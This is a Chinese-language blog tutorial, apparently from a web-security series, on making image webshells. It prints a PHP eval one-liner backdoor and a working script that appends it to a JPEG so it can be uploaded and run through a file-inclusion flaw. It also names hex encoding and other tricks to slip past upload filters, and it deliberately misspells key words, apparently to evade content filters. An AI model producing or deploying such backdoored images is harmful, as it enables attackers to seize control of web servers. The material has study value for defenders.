文件上传漏洞(六)一句话马图片

简介: 文件上传漏洞(六)一句话马图片

image.png

 

制作马图

方式一

一句话mu马图片是指将一句话mu马代码隐藏在正常的图片文件中,使得该图片文件成为一个mu马文件。公鸡者可以通过上传该图片文件到受害者的服务器上,并利用文件包含漏洞来执行该mu马代码,从而获取服务器的控制权。

下面是一个生成一句话mu马图片的示例代码:

<?php
$code = '<?php eval($_POST["cmd"]); ?>'; // 一句话马代码
$filename = 'shell.php'; // 生成的马文件名
$image = 'pic.jpg'; // 正常的图片文件名
$webshell = 'webshell.jpg'; // 生成的一句话马图片文件名

// 生成一句话马文件
file_put_contents($filename, $code);

// 将一句话mu马文件和正常的图片文件合并成一张图片马
$data = file_get_contents($image);
$data .= file_get_contents($filename);
file_put_contents($webshell, $data);

// 删除一句话马文件
unlink($filename);

该代码将一句话mu马代码存储在变量$code中,将生成的mu马文件名存储在变量$filename中,将正常的图片文件名存储在变量$image中,将生成的一句话mu马图片文件名存储在变量$webshell中。然后,该代码将一句话mu马文件和正常的图片文件合并成一张图片马,并将其保存为文件webshell.jpg。最后,该代码删除一句话mu马文件。

方式二

利用脚本edjpgcom

将图片投入到edjpgcom脚本,然后写入一句话马

方式三

利用cmd命令

image.png

方式四

利用16进制编写一句话,有更好的绕过安全过滤

image.png


相关文章
|
3月前
|
安全 关系型数据库 MySQL
Web安全-任意文件下载漏洞
Web安全-任意文件下载漏洞
189 5
|
2月前
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
2月前
|
安全 Java Linux
文件上传漏洞(三)Cknife
文件上传漏洞(三)Cknife
|
2月前
|
安全 网络协议 Shell
文件上传漏洞(七)XISE寄生虫Weevely学习
文件上传漏洞(七)XISE寄生虫Weevely学习
|
2月前
|
开发框架 安全 JavaScript
文件上传漏洞(五)一句话合集
文件上传漏洞(五)一句话合集
|
5月前
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
127 1
|
5月前
|
开发框架 安全 JavaScript
文件上传漏洞
文件上传漏洞允许攻击者上传可执行脚本,获取服务器控制权。常见原因包括服务器配置不当、验证不严等。防御措施包括设置不可执行的上传目录、严格文件类型检查、随机化文件名和路径,以及使用独立的文件服务器域名。WebShell是上传的恶意脚本,常用于控制网站服务器。
102 0
|
7月前
|
安全 网络安全
明御安全网关任意文件上传漏洞
安恒信息明御安全网关(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。
236 1
|
7月前
|
开发框架 安全 .NET
文件上传漏洞技术总结
该文总结了文件上传技术相关的漏洞和绕过方法,包括语言可解析的后缀(如phtml、pht)、常见的MIME类型、Windows特性(如大小写、ADS流、特殊字符)、0x00截断技巧(需满足PHP版本和magic_quotes_gpc状态)、POST型0x00截断、文件头检查(通过合成图片马绕过)、二次渲染(利用未修改部分插入恶意代码)以及各种服务器的解析漏洞(Apache的.htaccess、解析漏洞,IIS的目录解析、文件解析、默认解析和IIS 7.x/Nginx的畸形解析)。此外,还提到了Java的空字节截断问题。
184 1
文件上传漏洞技术总结
|
7月前
|
编解码 JavaScript PHP
文件上传绕过的常见方式
文件上传绕过的常见方式
116 0